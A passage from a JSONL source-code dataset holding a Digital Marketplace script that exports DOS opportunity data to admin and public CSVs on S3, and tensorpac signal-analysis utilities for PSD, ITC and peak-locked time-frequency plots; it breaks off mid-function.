mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n"} {"ext": "py", "sha": "1a3085302cc1414cf1e002789ed0229e352be1e9", "content": "import csv\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Any, List, Mapping\n\nfrom dmutils.formats import DATE_FORMAT, DATETIME_FORMAT\nfrom dmutils.s3 import S3\n\nfrom dmscripts.helpers.s3_helpers import get_bucket_name\n\n# This URL is framework agnostic\nPUBLIC_BRIEF_URL = \"https://www.digitalmarketplace.service.gov.uk/digital-outcomes-and-specialists/opportunities/{}\"\n\nDOS_OPPORTUNITY_HEADERS = [\n \"ID\", \"Opportunity\", \"Link\", \"Framework\", \"Category\", \"Specialist\",\n \"Organisation Name\", \"Buyer Domain\", \"Location Of The Work\",\n \"Published At\", \"Open For\", \"Expected Contract Length\", \"Applications from SMEs\",\n \"Applications from Large Organisations\", \"Total Organisations\", \"Status\", \"Winning supplier\",\n \"Size of supplier\", \"Contract amount\", \"Contract start date\", \"Clarification questions\", \"Employment status\"\n]\n\nDOWNLOAD_FILE_NAME = \"opportunity-data.csv\"\n\n\ndef format_datetime_string_as_date(dt):\n return datetime.strptime(dt, DATETIME_FORMAT).strftime(DATE_FORMAT) if dt else None\n\n\ndef remove_username_from_email_address(ea):\n return '{}'.format(ea.split('@').pop()) if ea else None\n\n\ndef _build_row(\n brief: dict, brief_responses: List[dict], include_buyer_user_details: bool = False\n) -> OrderedDict:\n winner = None\n applications_from_sme_suppliers = 0\n applications_from_large_suppliers = 0\n\n for brief_response in brief_responses:\n if brief_response['supplierOrganisationSize'] == 'large':\n applications_from_large_suppliers += 1\n else:\n applications_from_sme_suppliers += 1\n\n if brief_response['status'] == 'awarded':\n winner = brief_response\n\n row = OrderedDict(zip(DOS_OPPORTUNITY_HEADERS, [\n brief['id'],\n brief['title'],\n PUBLIC_BRIEF_URL.format(brief['id']),\n brief['frameworkSlug'],\n brief['lotSlug'],\n brief.get('specialistRole', \"\"),\n brief['organisation'],\n remove_username_from_email_address(brief['users'][0]['emailAddress']),\n brief['location'],\n format_datetime_string_as_date(brief['publishedAt']),\n brief.get('requirementsLength', '2 weeks'), # only briefs on the specialists lot include 'requirementsLength'\n brief.get('contractLength', ''),\n applications_from_sme_suppliers,\n applications_from_large_suppliers,\n applications_from_sme_suppliers + applications_from_large_suppliers,\n brief['status'],\n winner['supplierName'] if winner else '',\n winner['supplierOrganisationSize'] if winner else '',\n winner['awardDetails']['awardedContractValue'] if winner else '',\n winner['awardDetails']['awardedContractStartDate'] if winner else '',\n len(brief['clarificationQuestions']),\n brief.get('employmentStatus', ''),\n ]))\n\n if include_buyer_user_details:\n buyer_user = brief[\"users\"][0]\n row.update([\n (\"Buyer user name\", buyer_user[\"name\"]),\n (\"Buyer email address\", buyer_user[\"emailAddress\"]),\n (\"Buyer phone number\", buyer_user.get(\"phoneNumber\", \"\")),\n ])\n\n return row\n\n\ndef get_latest_dos_framework(client) -> str:\n frameworks = client.find_frameworks()['frameworks']\n for framework in frameworks:\n # Should be maximum of 1 live DOS framework\n if framework['family'] == 'digital-outcomes-and-specialists' and framework['status'] == 'live':\n return framework['slug']\n return 'digital-outcomes-and-specialists'\n\n\ndef get_brief_data(client, logger, include_buyer_user_details: bool = False) -> list:\n logger.info(\"Fetching closed briefs from API\")\n briefs = client.find_briefs_iter(status=\"closed,awarded,unsuccessful,cancelled\", with_users=True,\n with_clarification_questions=True)\n rows = []\n for brief in briefs:\n logger.info(f\"Fetching brief responses for Brief ID {brief['id']}\")\n brief_responses = client.find_brief_responses_iter(brief_id=brief['id'])\n rows.append(_build_row(brief, brief_responses, include_buyer_user_details))\n return rows\n\n\ndef write_rows_to_csv(rows: List[Mapping[str, Any]], file_path: Path, logger) -> None:\n logger.info(f\"Writing rows to {file_path}\")\n\n # assumes all rows have the same keys\n fieldnames = list(rows[0].keys())\n\n with open(file_path, 'w') as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames, delimiter=',', quotechar='\"')\n writer.writeheader()\n for row in rows:\n writer.writerow(row)\n\n\ndef upload_file_to_s3(\n file_path,\n bucket,\n remote_key_name: str,\n download_name: str,\n *,\n public: bool = True,\n dry_run: bool = False,\n logger,\n):\n with open(file_path, 'br') as source_file:\n acl = \"public-read\" if public else \"bucket-owner-full-control\"\n\n logger.info(\"{}UPLOAD: {} to s3://{}/{} with acl {}\".format(\n '[Dry-run]' if dry_run else '',\n file_path,\n bucket.bucket_name,\n remote_key_name,\n acl\n ))\n\n if not dry_run:\n # Save file\n bucket.save(\n remote_key_name,\n source_file,\n acl=acl,\n download_filename=download_name\n )\n\n\ndef export_dos_opportunities(\n client,\n logger,\n stage: str,\n output_dir,\n dry_run: bool = False\n):\n output_dir = Path(output_dir)\n if not output_dir.exists():\n logger.info(f\"Creating {output_dir} directory\")\n output_dir.mkdir(parents=True)\n\n latest_framework_slug = get_latest_dos_framework(client)\n\n communications_bucket = S3(get_bucket_name(stage, \"communications\"))\n reports_bucket = S3(get_bucket_name(stage, \"reports\"))\n\n logger.info(\"Exporting DOS opportunity data to CSV\")\n\n # Get the data\n rows = get_brief_data(client, logger, include_buyer_user_details=True)\n\n # Construct CSV for admins\n write_rows_to_csv(rows, output_dir / \"opportunity-data-for-admins.csv\", logger)\n # Construct public CSV (filter out buyer details)\n write_rows_to_csv(\n [\n OrderedDict((k, v) for k, v in row.items() if k in DOS_OPPORTUNITY_HEADERS)\n for row in rows\n ],\n output_dir / DOWNLOAD_FILE_NAME,\n logger\n )\n\n # Upload admin CSV to reports bucket\n upload_file_to_s3(\n output_dir / \"opportunity-data-for-admins.csv\",\n reports_bucket,\n f\"{latest_framework_slug}/reports/{DOWNLOAD_FILE_NAME}\",\n DOWNLOAD_FILE_NAME,\n public=False,\n dry_run=dry_run,\n logger=logger\n )\n\n # Upload public CSV to S3\n upload_file_to_s3(\n output_dir / DOWNLOAD_FILE_NAME,\n communications_bucket,\n f\"{latest_framework_slug}/communications/data/{DOWNLOAD_FILE_NAME}\",\n DOWNLOAD_FILE_NAME,\n public=True,\n dry_run=dry_run,\n logger=logger\n )\n"} {"ext": "py", "sha": "1a30887516fb47bb02abf1195fdda8c41a709f3c", "content": "\"\"\"Utility functions.\"\"\"\nimport logging\n\nimport numpy as np\nfrom scipy.signal import periodogram\n\nfrom tensorpac.methods.meth_pac import _kl_hr\nfrom tensorpac.pac import _PacObj, _PacVisual\nfrom tensorpac.io import set_log_level\n\nfrom matplotlib.gridspec import GridSpec\nimport matplotlib.pyplot as plt\n\nlogger = logging.getLogger('tensorpac')\n\n\ndef pac_vec(f_pha='mres', f_amp='mres'):\n \"\"\"Generate cross-frequency coupling vectors.\n\n Parameters\n ----------\n Frequency vector for the phase and amplitude. Here you can use\n several forms to define those vectors :\n\n * Basic list/tuple (ex: [2, 4] or [8, 12]...)\n * List of frequency bands (ex: [[2, 4], [5, 7]]...)\n * Dynamic definition : (start, stop, width, step)\n * Range definition (ex : np.arange(3) => [[0, 1], [1, 2]])\n * Using a string. `f_pha` and `f_amp` can be 'lres', 'mres', 'hres'\n respectively for low, middle and high resolution vectors. In that\n case, it uses the definition proposed by Bahramisharif et al. 2013\n :cite:`bahramisharif2013propagating` i.e\n f_pha = [f - f / 4, f + f / 4] and f_amp = [f - f / 8, f + f / 8]\n\n Returns\n -------\n f_pha, f_amp : array_like\n Arrays containing the pairs of phase and amplitude frequencies. Each\n vector have a shape of (N, 2).\n \"\"\"\n nb_fcy = dict(lres=10, mres=30, hres=50, demon=70, hulk=100)\n if isinstance(f_pha, str):\n # get where phase frequencies start / finish / number\n f_pha_start, f_pha_end = 2, 20\n f_pha_nb = nb_fcy[f_pha]\n # f_pha = [f - f / 4, f + f / 4]\n f_pha_mid = np.linspace(f_pha_start, f_pha_end, f_pha_nb)\n f_pha = np.c_[f_pha_mid - f_pha_mid / 4., f_pha_mid + f_pha_mid / 4.]\n if isinstance(f_amp, str):\n # get where amplitude frequencies start / finish / number\n f_amp_start, f_amp_end = 60, 160\n f_amp_nb = nb_fcy[f_amp]\n # f_amp = [f - f / 8, f + f / 8]\n f_amp_mid = np.linspace(f_amp_start, f_amp_end, f_amp_nb)\n f_amp = np.c_[f_amp_mid - f_amp_mid / 8., f_amp_mid + f_amp_mid / 8.]\n\n return _check_freq(f_pha), _check_freq(f_amp)\n\n\ndef _check_freq(f):\n \"\"\"Check the frequency definition.\"\"\"\n f = np.atleast_2d(np.asarray(f))\n #\n if len(f.reshape(-1)) == 1:\n raise ValueError(\"The length of f should at least be 2.\")\n elif 2 in f.shape: # f of shape (N, 2) or (2, N)\n if f.shape[1] is not 2:\n f = f.T\n elif np.squeeze(f).shape == (4,): # (f_start, f_end, f_width, f_step)\n f = _pair_vectors(*tuple(np.squeeze(f)))\n else: # Sequential\n f = f.reshape(-1)\n f.sort()\n f = np.c_[f[0:-1], f[1::]]\n return f\n\n\ndef _pair_vectors(f_start, f_end, f_width, f_step):\n # Generate two array for phase and amplitude :\n fdown = np.arange(f_start, f_end - f_width, f_step)\n fup = np.arange(f_start + f_width, f_end, f_step)\n return np.c_[fdown, fup]\n\n\ndef pac_trivec(f_start=60., f_end=160., f_width=10.):\n \"\"\"Generate triangular vector.\n\n By contrast with the pac_vec function, this function generate frequency\n vector with an increasing frequency bandwidth.\n\n Parameters\n ----------\n f_start : float | 60.\n Starting frequency.\n f_end : float | 160.\n Ending frequency.\n f_width : float | 10.\n Frequency bandwidth increase between each band.\n\n Returns\n -------\n f : array_like\n The triangular vector.\n tridx : array_like\n The triangular index for the reconstruction.\n \"\"\"\n starting = np.arange(f_start, f_end + f_width, f_width)\n f, tridx = np.array([]), np.array([])\n for num, k in enumerate(starting[0:-1]):\n # Lentgh of the vector to build :\n le = len(starting) - (num + 1)\n # Create the frequency vector for this starting frequency :\n fst = np.c_[np.full(le, k), starting[num + 1::]]\n nfst = fst.shape[0]\n # Create the triangular index for this vector of frequencies :\n idx = np.c_[np.flipud(np.arange(nfst)), np.full(nfst, num)]\n tridx = np.concatenate((tridx, idx), axis=0) if tridx.size else idx\n f = np.concatenate((f, fst), axis=0) if f.size else fst\n return f, tridx\n\n\nclass PSD(object):\n \"\"\"Power Spectrum Density for electrophysiological brain data.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency.\n \"\"\"\n\n def __init__(self, x, sf):\n \"\"\"Init.\"\"\"\n assert isinstance(x, np.ndarray) and (x.ndim == 2), (\n \"x should be a 2d array of shape (n_epochs, n_times)\")\n self._n_trials, self._n_times = x.shape\n logger.info(f\"Compute PSD over {self._n_trials} trials and \"\n f\"{self._n_times} time points\")\n self._freqs, self._psd = periodogram(x, fs=sf, window=None,\n nfft=self._n_times,\n detrend='constant',\n return_onesided=True,\n scaling='density', axis=1)\n\n def plot(self, f_min=None, f_max=None, confidence=95, interp=None,\n log=False, grid=True, fz_title=18, fz_labels=15):\n \"\"\"Plot the PSD.\n\n Parameters\n ----------\n f_min, f_max : (int, float) | None\n Frequency bounds to use for plotting\n confidence : (int, float) | None\n Light gray confidence interval. If None, no interval will be\n displayed\n interp : int | None\n Line interpolation integer. For example, if interp is 10 the number\n of points is going to be multiply by 10\n log : bool | False\n Use a log scale representation\n grid : bool | True\n Add a grid to the plot\n fz_title : int | 18\n Font size for the title\n fz_labels : int | 15\n Font size the x/y labels\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n f_types = (int, float)\n # interpolation\n xvec, yvec = self._freqs, self._psd\n if isinstance(interp, int) and (interp > 1):\n # from scipy.interpolate import make_interp_spline, BSpline\n from scipy.interpolate import interp1d\n xnew = np.linspace(xvec[0], xvec[-1], len(xvec) * interp)\n f = interp1d(xvec, yvec, kind='quadratic', axis=1)\n yvec = f(xnew)\n xvec = xnew\n # (f_min, f_max)\n f_min = xvec[0] if not isinstance(f_min, f_types) else f_min\n f_max = xvec[-1] if not isinstance(f_max, f_types) else f_max\n # plot main psd\n plt.plot(xvec, yvec.mean(0), color='black',\n label='mean PSD over trials')\n # plot confidence interval\n if isinstance(confidence, (int, float)) and (0 < confidence < 100):\n logger.info(f\" Add {confidence}th confidence interval\")\n interval = (100. - confidence) / 2\n kw = dict(axis=0, interpolation='nearest')\n psd_min = np.percentile(yvec, interval, **kw)\n psd_max = np.percentile(yvec, 100. - interval, **kw)\n plt.fill_between(xvec, psd_max, psd_min, color='lightgray',\n alpha=0.5,\n label=f\"{confidence}th confidence interval\")\n plt.legend(fontsize=fz_labels)\n plt.xlabel(\"Frequencies (Hz)\", fontsize=fz_labels)\n plt.ylabel(\"Power (V**2/Hz)\", fontsize=fz_labels)\n plt.title(f\"PSD mean over {self._n_trials} trials\", fontsize=fz_title)\n plt.xlim(f_min, f_max)\n if log:\n from matplotlib.ticker import ScalarFormatter\n plt.xscale('log', basex=10)\n plt.gca().xaxis.set_major_formatter(ScalarFormatter())\n if grid:\n plt.grid(color='grey', which='major', linestyle='-',\n linewidth=1., alpha=0.5)\n plt.grid(color='lightgrey', which='minor', linestyle='--',\n linewidth=0.5, alpha=0.5)\n\n return plt.gca()\n\n def plot_st_psd(self, f_min=None, f_max=None, log=False, grid=True,\n fz_title=18, fz_labels=15, fz_cblabel=15, **kw):\n \"\"\"Single-trial PSD plot.\n\n Parameters\n ----------\n f_min, f_max : (int, float) | None\n Frequency bounds to use for plotting\n log : bool | False\n Use a log scale representation\n grid : bool | True\n Add a grid to the plot\n fz_title : int | 18\n Font size for the title\n fz_labels : int | 15\n Font size the x/y labels\n fz_cblabel : int | 15\n Font size the colorbar label labels\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n # manage input variables\n kw['fz_labels'] = kw.get('fz_labels', fz_labels)\n kw['fz_title'] = kw.get('fz_title', fz_title)\n kw['fz_cblabel'] = kw.get('fz_cblabel', fz_title)\n kw['xlabel'] = kw.get('xlabel', \"Frequencies (Hz)\")\n kw['ylabel'] = kw.get('ylabel', \"Trials\")\n kw['title'] = kw.get('title', \"Single-trial PSD\")\n kw['cblabel'] = kw.get('cblabel', \"Power (V**2/Hz)\")\n # (f_min, f_max)\n xvec, psd = self._freqs, self._psd\n f_types = (int, float)\n f_min = xvec[0] if not isinstance(f_min, f_types) else f_min\n f_max = xvec[-1] if not isinstance(f_max, f_types) else f_max\n # locate (f_min, f_max) indices\n f_min_idx = np.abs(xvec - f_min).argmin()\n f_max_idx = np.abs(xvec - f_max).argmin()\n sl_freq = slice(f_min_idx, f_max_idx)\n xvec = xvec[sl_freq]\n psd = psd[:, sl_freq]\n # make the 2D plot\n _viz = _PacVisual()\n trials = np.arange(self._n_trials)\n _viz.pacplot(psd, xvec, trials, **kw)\n if log:\n from matplotlib.ticker import ScalarFormatter\n plt.xscale('log', basex=10)\n plt.gca().xaxis.set_major_formatter(ScalarFormatter())\n if grid:\n plt.grid(color='grey', which='major', linestyle='-',\n linewidth=1., alpha=0.5)\n plt.grid(color='lightgrey', which='minor', linestyle='--',\n linewidth=0.5, alpha=0.5)\n\n return plt.gca()\n\n def show(self):\n \"\"\"Display the PSD figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def freqs(self):\n \"\"\"Get the frequency vector.\"\"\"\n return self._freqs\n\n @property\n def psd(self):\n \"\"\"Get the psd value.\"\"\"\n return self._psd\n\n\nclass BinAmplitude(_PacObj):\n \"\"\"Bin the amplitude according to the phase.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n f_amp : tuple, list | [60, 80]\n List of two floats describing the frequency bounds for extracting the\n amplitude\n n_bins : int | 18\n Number of bins to use to binarize the phase and the amplitude\n dcomplex : {'wavelet', 'hilbert'}\n Method for the complex definition. Use either 'hilbert' or\n 'wavelet'.\n cycle : tuple | (3, 6)\n Control the number of cycles for filtering (only if dcomplex is\n 'hilbert'). Should be a tuple of integers where the first one\n refers to the number of cycles for the phase and the second for the\n amplitude :cite:`bahramisharif2013propagating`.\n width : int | 7\n Width of the Morlet's wavelet.\n edges : int | None\n Number of samples to discard to avoid edge effects due to filtering\n \"\"\"\n\n def __init__(self, x, sf, f_pha=[2, 4], f_amp=[60, 80], n_bins=18,\n dcomplex='hilbert', cycle=(3, 6), width=7, edges=None,\n n_jobs=-1):\n \"\"\"Init.\"\"\"\n _PacObj.__init__(self, f_pha=f_pha, f_amp=f_amp, dcomplex=dcomplex,\n cycle=cycle, width=width)\n # check\n x = np.atleast_2d(x)\n assert x.ndim <= 2, (\"`x` input should be an array of shape \"\n \"(n_epochs, n_times)\")\n assert isinstance(sf, (int, float)), (\"`sf` input should be a integer \"\n \"or a float\")\n assert all([isinstance(k, (int, float)) for k in f_pha]), (\n \"`f_pha` input should be a list of two integers / floats\")\n assert all([isinstance(k, (int, float)) for k in f_amp]), (\n \"`f_amp` input should be a list of two integers / floats\")\n assert isinstance(n_bins, int), \"`n_bins` should be an integer\"\n logger.info(f\"Binning {f_amp}Hz amplitude according to {f_pha}Hz \"\n \"phase\")\n # extract phase and amplitude\n kw = dict(keepfilt=False, edges=edges, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', **kw)\n amp = self.filter(sf, x, 'amplitude', **kw)\n # binarize amplitude according to phase\n self._amplitude = _kl_hr(pha, amp, n_bins, mean_bins=False).squeeze()\n self.n_bins = n_bins\n\n def plot(self, unit='rad', normalize=False, **kw):\n \"\"\"Plot the amplitude.\n\n Parameters\n ----------\n unit : {'rad', 'deg'}\n The unit to use for the phase. Use either 'deg' for degree or 'rad'\n for radians\n normalize : bool | None\n Normalize the histogram by the maximum\n kw : dict | {}\n Additional inputs are passed to the matplotlib.pyplot.bar function\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n assert unit in ['rad', 'deg']\n if unit == 'rad':\n self._phase = np.linspace(-np.pi, np.pi, self.n_bins)\n width = 2 * np.pi / self.n_bins\n elif unit == 'deg':\n self._phase = np.linspace(-180, 180, self.n_bins)\n width = 360 / self.n_bins\n amp_mean = self._amplitude.mean(1)\n if normalize:\n amp_mean /= amp_mean.max()\n plt.bar(self._phase, amp_mean, width=width, **kw)\n plt.xlabel(f\"Frequency phase ({self.n_bins} bins)\", fontsize=18)\n plt.ylabel(\"Amplitude\", fontsize=18)\n plt.title(\"Binned amplitude\")\n plt.autoscale(enable=True, axis='x', tight=True)\n\n def show(self):\n \"\"\"Show the figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def amplitude(self):\n \"\"\"Get the amplitude value.\"\"\"\n return self._amplitude\n\n @property\n def phase(self):\n \"\"\"Get the phase value.\"\"\"\n return self._phase\n\n\nclass ITC(_PacObj, _PacVisual):\n \"\"\"Compute the Inter-Trials Coherence (ITC).\n\n The Inter-Trials Coherence (ITC) is a measure of phase consistency over\n trials for a single recording site (electrode / sensor etc.).\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n dcomplex : {'wavelet', 'hilbert'}\n Method for the complex definition. Use either 'hilbert' or\n 'wavelet'.\n cycle : tuple | 3\n Control the number of cycles for filtering the phase (only if dcomplex\n is 'hilbert').\n width : int | 7\n Width of the Morlet's wavelet.\n edges : int | None\n Number of samples to discard to avoid edge effects due to filtering\n \"\"\"\n\n def __init__(self, x, sf, f_pha=[2, 4], dcomplex='hilbert', cycle=3,\n width=7, edges=None, n_jobs=-1, verbose=None):\n \"\"\"Init.\"\"\"\n set_log_level(verbose)\n _PacObj.__init__(self, f_pha=f_pha, f_amp=[60, 80], dcomplex=dcomplex,\n cycle=(cycle, 6), width=width)\n _PacVisual.__init__(self)\n # check\n x = np.atleast_2d(x)\n assert x.ndim <= 2, (\"`x` input should be an array of shape \"\n \"(n_epochs, n_times)\")\n self._n_trials = x.shape[0]\n logger.info(\"Inter-Trials Coherence (ITC)\")\n logger.info(f\" extracting {len(self.xvec)} phases\")\n # extract phase and amplitude\n kw = dict(keepfilt=False, edges=edges, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', **kw)\n # compute itc\n self._itc = np.abs(np.exp(1j * pha).mean(1)).squeeze()\n self._sf = sf\n\n def plot(self, times=None, **kw):\n \"\"\"Plot the Inter-Trials Coherence.\n\n Parameters\n ----------\n times : array_like | None\n Custom time vector to use\n kw : dict | {}\n Additional inputs are either pass to the matplotlib.pyplot.plot\n function if a single phase band is used, otherwise to the\n matplotlib.pyplot.pcolormesh function\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n n_pts = self._itc.shape[-1]\n if not isinstance(times, np.ndarray):\n times = np.arange(n_pts) / self._sf\n times = times[self._edges]\n assert len(times) == n_pts, (\"The length of the time vector should be \"\n \"{n_pts}\")\n xlab = 'Time'\n title = f\"Inter-Trials Coherence ({self._n_trials} trials)\"\n if self._itc.ndim == 1:\n plt.plot(times, self._itc, **kw)\n elif self._itc.ndim == 2:\n vmin = kw.get('vmin', np.percentile(self._itc, 1))\n vmax = kw.get('vmax', np.percentile(self._itc, 99))\n self.pacplot(self._itc, times, self.xvec, vmin=vmin, vmax=vmax,\n ylabel=\"Frequency for phase (Hz)\", xlabel=xlab,\n title=title, **kw)\n return plt.gca()\n\n def show(self):\n \"\"\"Show the figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def itc(self):\n \"\"\"Get the itc value.\"\"\"\n return self._itc\n\n\nclass PeakLockedTF(_PacObj, _PacVisual):\n \"\"\"Peak-Locked Time-frequency representation.\n\n This class can be used in order to re-align time-frequency representations\n around a time-point (cue) according to the closest phase peak. This type\n of visualization can bring out a cyclic behavior of the amplitude at a\n given phase, potentially indicating the presence of a phase-amplitude\n coupling. Here's the detailed pipeline :\n\n * Filter around a single phase frequency bands and across multiple\n amplitude frequencies\n * Use a `cue` which define the time-point to use for the realignment\n * Detect in the filtered phase the closest peak to the cue. This step\n is repeated to each trial in order to get a list of length (n_epochs)\n that contains the number of sample (shift) so that if the phase is\n moved, the peak fall onto the cue. A positive shift indicates that\n the phase is moved forward while a negative shift is for a backward\n move\n * Apply, to each trial, this shift to the amplitude\n * Plot the mean re-aligned amplitudes\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n cue : int, float\n Time-point to use in order to detect the closest phase peak. This\n parameter works in conjunction with the `times` input below. Use\n either :\n\n * An integer and `times` is None to indicate that you want to\n realign according to a time-point in sample\n * A integer or a float with `times` the time vector if you want\n that Tensorpac automatically infer the sample number around which\n to align\n times : array_like | None\n Time vector\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n f_amp : tuple, list | [60, 80]\n Frequency vector for the amplitude. Here you can use several forms to\n define those vectors :\n\n * Dynamic definition : (start, stop, width, step)\n * Using a string : `f_amp` can be 'lres', 'mres', 'hres'\n respectively for low, middle and high resolution vectors\n cycle : tuple | (3, 6)\n Control the number of cycles for filtering. Should be a tuple of\n integers where the first one refers to the number of cycles for the\n phase and the second for the amplitude\n :cite:`bahramisharif2013propagating`.\n \"\"\"\n\n def __init__(self, x, sf, cue, times=None, f_pha=[5, 7], f_amp='hres',\n cycle=(3, 6), n_jobs=-1, verbose=None):\n \"\"\"Init.\"\"\"\n set_log_level(verbose)\n # initialize to retrieve filtering methods\n _PacObj.__init__(self, f_pha=f_pha, f_amp=f_amp, dcomplex='hilbert',\n cycle=cycle)\n _PacVisual.__init__(self)\n logger.info(\"PeakLockedTF object defined\")\n # inputs checking\n x = np.atleast_2d(x)\n assert isinstance(x, np.ndarray) and (x.ndim == 2)\n assert isinstance(sf, (int, float))\n assert isinstance(cue, (int, float))\n assert isinstance(f_pha, (list, tuple)) and (len(f_pha) == 2)\n n_epochs, n_times = x.shape\n\n # manage cur conversion\n if times is None:\n cue = int(cue)\n times = np.arange(n_times)\n logger.info(f\" align on sample cue={cue}\")\n else:\n assert isinstance(times, np.ndarray) and (len(times) == n_times)\n cue_time = cue\n cue = np.abs(times - cue).argmin() - 1\n logger.info(f\" align on time-point={cue_time} (sample={cue})\")\n self.cue, self._times = cue, times\n\n # extract phase and amplitudes\n logger.info(f\" extract phase and amplitudes \"\n f\"(n_amps={len(self.yvec)})\")\n kw = dict(keepfilt=False, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', n_jobs=n_jobs, keepfilt=True)\n amp = self.filter(sf, x, 'amplitude', n_jobs=n_jobs)\n self._pha, self._amp = pha, amp ** 2\n\n # peak detection\n logger.info(f\" running peak detection around sample={cue}\")\n self.shifts = self._peak_detection(self._pha.squeeze(), cue)\n\n # realign phases and amplitudes\n logger.info(f\" realign the {n_epochs} phases and amplitudes\")\n self.amp_a = self._shift_signals(self._amp, self.shifts, fill_with=0.)\n self.pha_a = self._shift_signals(self._pha, self.shifts, fill_with=0.)\n\n @staticmethod\n def _peak_detection(pha, cue):\n \"\"\"Single trial closest to a cue peak detection.\n\n Parameters\n ----------\n pha : array_like\n Array of single trial phases of shape (n_trials, n_times)\n cue : int\n Cue to use as a reference (in sample unit)\n\n Returns\n -------\n peaks : array_like\n Array of length (n_trials,) describing each delay to apply\n to each trial in order to realign the phases. In detail :\n\n * Positive delays means that zeros should be prepend\n * Negative delays means that zeros should be append\n \"\"\"\n n_trials, n_times = pha.shape\n peaks = []\n for tr in range(n_trials):\n # select the single trial phase\n st_pha = pha[tr, :]\n # detect all peaks across time points\n st_peaks = []\n for t in range(n_times - 1):\n if (st_pha[t - 1] < st_pha[t]) and (st_pha[t] > st_pha[t + 1]):\n st_peaks += [t]\n # detect the minimum peak\n min_peak = st_peaks[np.abs(np.array(st_peaks) - cue).argmin()]\n peaks += [cue - min_peak]\n\n return np.array(peaks)\n\n @staticmethod\n def _shift_signals(sig, n_shifts, fill_with=0):\n \"\"\"Shift an array of signals according to an array of delays.\n\n Parameters\n ----------\n sig : array_like\n Array of signals of shape (n_freq, n_trials, n_times)\n n_shifts : array_like\n Array of delays to apply to each trial of shape (n_trials,)\n fill_with : int\n Value to prepend / append to each shifted time-series\n\n Returns\n -------\n sig_shifted : array_like\n Array of shifted signals with the same shape as the input\n \"\"\"\n # prepare the needed variables\n n_freqs, n_trials, n_pts = sig.shape\n sig_shifted = np.zeros_like(sig)\n # shift each trial\n for tr in range(n_trials):\n # select the data of a specific trial\n st_shift = n_shifts[tr]\n st_sig = sig[:, tr, :]\n fill = np.full((n_freqs, abs(st_shift)), fill_with,\n dtype=st_sig.dtype)\n # shift this specific trial\n if st_shift > 0: # move forward = prepend zeros\n sig_shifted[:, tr, :] = np.c_[fill, st_sig][:, 0:-st_shift]\n elif st_shift < 0: # move backward = append zeros\n sig_shifted[:, tr, :] = np.c_[st_sig, fill][:, abs(st_shift):]\n\n return sig_shifted\n\n def plot(self, zscore=False, baseline=None, edges=0, **kwargs):\n \"\"\"Integrated Peak-Locked TF plotting function.\n\n Parameters\n ----------\n zscore : bool | False\n Normalize the power by using a z-score normalization. This can be\n useful in order to compensate the 1 / f effect in the power\n spectrum. If True, the mean and deviation are computed at the\n single trial level and across all time points\n baseline : tuple | None\n Baseline period to use in order to apply the z-score correction.\n Should be in samples.\n edges : int | 0\n Number of pixels to discard to compensate filtering edge effect\n (`power[edges:-edges]`).\n kwargs : dict | {}\n Additional arguments are sent to the\n :class:`tensorpac.utils.PeakLockedTF.pacplot` method\n \"\"\"\n # manage additional arguments\n kwargs['colorbar'] = False\n kwargs['ylabel'] = 'Frequency for amplitude (hz)'\n kwargs['xlabel'] = ''\n kwargs['fz_labels'] = kwargs.get('fz_labels', 14)\n kwargs['fz_cblabel'] = kwargs.get('fz_cblabel', 14)\n kwargs['fz_title'] = kwargs.get('fz_title', 16)\n sl_times = slice(edges, len(self._times) - edges)\n times = self._times[sl_times]\n pha_n = self.pha_a[..., sl_times].squeeze()\n # z-score normalization\n if zscore:\n if baseline is None:\n bsl_idx = sl_times\n else:\n assert len(baseline) == 2\n bsl_idx = slice(baseline[0], baseline[1])\n _mean = self.amp_a[..., bsl_idx].mean(2, keepdims=True)\n _std = self.amp_a[..., bsl_idx].std(2, keepdims=True)\n _std[_std == 0.] = 1. # correction from NaN\n amp_n = (self.amp_a[..., sl_times] - _mean) / _std\n else:\n amp_n = self.amp_a[..., sl_times]\n\n # grid definition\n gs = GridSpec(8, 8)\n # image plot\n plt.subplot(gs[slice(0, 6), 0:-1])\n self.pacplot(amp_n.mean(1), times, self.yvec, **kwargs)\n plt.axvline(times[self.cue], color='w', lw=2)\n plt.tick_params(bottom=False, labelbottom=False)\n ax_1 = plt.gca()\n # external colorbar\n plt.subplot(gs[slice(1, 5), -1])\n cb = plt.colorbar(self._plt_im, pad=0.01, cax=plt.gca())\n cb.set_label('Power (V**2/Hz)', fontsize=kwargs['fz_cblabel'])\n cb.outline.set_visible(False)\n # phase plot\n plt.subplot(gs[slice(6, 8), 0:-1])\n plt.plot(times, pha_n.T, color='lightgray', alpha=.2, lw=1.)\n plt.plot(times, pha_n.mean(0), label='single trial phases', alpha=.2,\n lw=1.) # legend tweaking\n plt.plot(times, pha_n.mean(0), label='mean phases',\n color='#1f77b4')\n plt.axvline(times[self.cue], color='k', lw=2)\n plt.autoscale(axis='both', tight=True, enable=True)\n plt.xlabel(\"Times\", fontsize=kwargs['fz_labels'])\n plt.ylabel(\"V / Hz\", 